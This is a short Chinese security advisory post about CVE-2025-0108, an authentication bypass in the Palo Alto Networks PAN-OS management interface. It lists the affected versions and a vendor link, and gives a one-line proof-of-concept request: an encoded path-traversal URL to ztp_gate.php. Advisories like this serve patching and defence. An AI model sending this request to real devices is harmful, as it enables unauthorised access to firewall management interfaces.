CVE-2025-0108|Palo Alto Networks PAN-OS管理界面认证绕过漏洞(POC)

发布于 作者:

CVE-2025-0108|Palo Alto Networks PAN-OS管理界面认证绕过漏洞(POC)

alicy 信安百科 2025-02-15 10:30

0x00 前言

派拓网络(Palo Alto Networks)是一家网络安全公司,总部位于美国加利福尼亚州圣克拉拉市。公司的核心产品为“下一代防火墙”(Next-Generation Firewall)平台,提供网络活动的可视化能力,可基于应用(App-ID)、用户(User-ID)与内容(Content-ID)进行网络活动的精细化控制,同时提供基于云的安全服务(GlobalProtect与WildFire)来拓展防火墙的安全性。

0x01 漏洞描述

Palo Alto Networks PAN-OS管理界面存在认证绕过漏洞,未经身份验证的攻击者可通过网络访问管理界面,进而绕过身份验证机制。

0x02 CVE编号

CVE-2025-0108

0x03 影响版本

PAN OS 11.2 < 11.2.4-h4

PAN OS 11.1 < 11.1.6-h1

PAN OS 10.2 < 10.2.13-h3

PAN OS 10.1 < 10.1.14-h9

0x04 漏洞详情

POC:

https://xx.xx.xx.xx/unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css

0x05 参考链接

https://security.paloaltonetworks.com/CVE-2025-0108

推荐阅读:

CVE-2025-21535|Oracle WebLogic Server远程代码执行漏洞

CVE-2024-56145|Craft CMS远程代码执行漏洞(POC)

CVE-2024-48307|JeecgBoot SQL 注入漏洞(POC)

Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持

!!!

本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。